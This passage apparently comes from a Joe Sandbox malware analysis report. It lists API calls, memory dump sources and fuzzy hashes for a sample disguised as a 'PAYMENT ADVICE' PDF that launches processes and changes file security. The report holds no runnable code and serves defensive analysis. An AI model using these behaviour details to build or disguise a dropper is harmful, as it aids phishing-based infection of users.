                                                                                                                                    • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                      • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                      • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3585118688-0
                                                                                                                                    • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                    • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                    • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                    • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3449924974-0
                                                                                                                                    • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                    • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                    • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                      • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                    • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                    • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: nsa
                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                    • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                    • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                    • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                    • API String ID: 0-2732225958
                                                                                                                                    • Opcode ID: 4a19f300d539f5a80c65697af47c6681574d0c800c6ba6d0e4f371dab14c8792
                                                                                                                                    • Instruction ID: 754a7ef0d7f9745d3213d6aa133241386f62a77bad56f8f31bcdd4ae39cbaf70
                                                                                                                                    • Opcode Fuzzy Hash: 4a19f300d539f5a80c65697af47c6681574d0c800c6ba6d0e4f371dab14c8792
                                                                                                                                    • Instruction Fuzzy Hash: 41319230E0121A9FDF648BB9CD403AEBBB6AF84310F1944B9C855A7254EB70CD90CB92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                    • API String ID: 0-3001612457
                                                                                                                                    • Opcode ID: d12e65d96e0494a851b2e7d82d9c68c07fb705e234273e84dcc1f4f610b44f4a
                                                                                                                                    • Instruction ID: 499255676d3656734e62ba6b271d44ed49e18ea818d5a7c9e2c21d8a9e3a7746
                                                                                                                                    • Opcode Fuzzy Hash: d12e65d96e0494a851b2e7d82d9c68c07fb705e234273e84dcc1f4f610b44f4a
                                                                                                                                    • Instruction Fuzzy Hash: 9501B131740905CF8B688E2DC84492577EBAF88B78B254469E046CF3B0DB32DC51C780
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                    • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9